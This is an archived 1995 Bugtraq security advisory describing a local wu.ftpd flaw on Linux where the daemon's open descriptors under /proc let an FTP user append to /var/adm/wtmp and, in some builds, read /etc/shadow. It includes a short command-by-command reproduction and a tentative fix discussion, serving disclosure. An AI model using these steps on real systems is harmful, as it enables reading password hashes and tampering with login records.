Bugtraq mailing list archives
Security Problem ftpd (includes wu.ftpd 2.4 and 2.4.2 beta 4)
From: H.Karrenbeld () ct utwente nl (Henri Karrenbeld)
Date: Wed, 12 Jul 1995 13:34:10 +0100
Description: People with local ftp access can use the filedescriptors in /proc of the iwu.)ftpd process (which is running under their euid) to read and append to files to which they should not have access. This gives write permission to /var/adm/wtmp and read access to /etc/shadow, if your ftpd is hacked in a 'dirty' way to incorporate shadow passwords. The 2.4 version also gave write access to /var/adm/xferlog. A friend of mine reported write access to /etc/ftpconversions (with possible root vulnerabilities), but I have not been able to repeat that (2.4.2 beta 4 appears to be safe in this) How to show your sysadmin it works (test done with 2.4.2 beta): $ ftp -n localhost user: <yourname> password: <yourpassword> ftp> <ctrl-Z> Now find the process id of the wu.ftpd running: $ ps -alxw |grep <yourname> 0 502 2728 46 1 0 527 396 1416fc S ? 0:00 -loopback: <yourname> ^ +---- this is the one! $ cd /proc/2728/fd $ ls -lG total 0 lrwx------ 1 <yourname> 64 Jul 12 13:07 0 -> [0000]:0 lrwx------ 1 <yourname> 64 Jul 12 13:07 1 -> [0000]:0 l-wx------ 1 <yourname> 64 Jul 12 13:07 2 -> [0301]:4141 lrwx------ 1 <yourname> 64 Jul 12 13:07 3 -> [0000]:0 -r-x------ 1 <yourname> 64 Jul 12 13:07 4 -> [0301]:92276 l-wx------ 1 <yourname> 64 Jul 12 13:07 5 -> [0301]:24718 $ ls -il /var/adm/wtmp 24718 -rw-r--r-- 1 root root 183911 Jul 12 13:04 /var/adm/wtmp So normal access for wtmp is 644, however this 'hard link' into the filesystem points directly to the inode (24718) and gives you write access to this file by writing to /proc/2728/fd/5 instead of to /var/adm/wtmp. If your wu.ftpd has implemented shadow password in a 'dirty' way, there is also a filedescriptor for /etc/shadow (only this is lr-x, but it still defeats the entire idea of having a shadow password file). Other versions of wu.ftpd or other setups might have more or other fd's opened ( /etc/ftpusers, /etc/ftpaccess, etc. etc.) but those have not shown write access on all systems I checked (wu.ftpd 2.4 and 2.4.2 beta, with linux kernels 1.2.1, 1.2.3, 1.2.8 and 1.2.9). How to fix? I'm afraid I don't have enough skills myself to fix this myself, obviously in involves opening and closing the /var/adm/wtmp after it has been written to, so the filedescriptor will not be in the /proc filesystem anymore, however there might be a possible race condition here (actually you could consider this also a race condition, only a very slow one ;-). While this is a feasible solution for the use of /var/adm/wtmp, which is only accessed at login or logoff from ftp, it is not one for /var/adm/xferlog, however upgrading to 2.4.2 beta 4 (or above) will probable solve the problem for illegal access to this file. Other programs? Well, all the Linux machines I have access to use wu.ftpd, however you should not be surprised if this trick also works with ftpd of other origin. Your mileagle may vary. $) Henri
Current thread:
- Re: Exploit for Linux wu.ftpd hole, (continued)
- Re: Exploit for Linux wu.ftpd hole Mike Edulla (Jul 08)
- web site Aleph One (Jul 07)
- Jul 9 08:06:03 all inetd[122]: httpd/tcp server failing Dr. Frederick B. Cohen (Jul 09)
- Re: Jul 9 08:06:03 all inetd[122]: httpd/tcp server failing Darren Reed (Jul 09)
- updated-secure-w#-daemons Dr. Frederick B. Cohen (Jul 09)
- Re: Jul 9 08:06:03 all inetd[122]: httpd/tcp server failing Kent Fitch (Jul 09)
- Re: Jul 9 08:06:03 all inetd[122]: httpd/tcp server failing Casper Dik (Jul 10)
- Re: Jul 9 08:06:03 all inetd[122]: httpd/tcp server failing Ken Wilcox (Jul 11)
- Exploit+fix for Linux SIGURG Marek Michalkiewicz (Jul 11)
- The FTP Bounce Attack *Hobbit* (Jul 11)
- Security Problem ftpd (includes wu.ftpd 2.4 and 2.4.2 beta 4) Henri Karrenbeld (Jul 12)
- Re: Security Problem ftpd (includes wu.ftpd 2.4 and 2.4.2 beta 4) Marek Michalkiewicz (Jul 12)
- Re: Security Problem ftpd (includes wu.ftpd 2.4 and 2.4.2 beta 4) James Seng (Jul 12)
- Re: Security Problem ftpd (includes wu.ftpd 2.4 and 2.4.2 beta 4) Henri Karrenbeld (Jul 12)
- Re: Security Problem ftpd (includes wu.ftpd 2.4 and 2.4.2 beta 4) Aleph One (Jul 13)
- Re: Security Problem ftpd (includes wu.ftpd 2.4 and 2.4.2 beta 4) Jeremy Fitzhardinge (Jul 13)
- Re: Security Problem ftpd (includes wu.ftpd 2.4 and 2.4.2 beta 4) James W. Abendschan (Jul 12)
- Re: Security Problem ftpd (includes wu.ftpd 2.4 and 2.4.2 beta 4) Lyndon Nerenberg (Jul 12)
- Re: Security Problem ftpd (includes wu.ftpd 2.4 and 2.4.2 beta 4) Aleph One (Jul 13)
- Re: Jul 9 08:06:03 all inetd[122]: httpd/tcp server failing Karl Strickland (Jul 10)
- Re: Jul 9 08:06:03 all inetd[122]: httpd/tcp server failing Perry E. Metzger (Jul 10)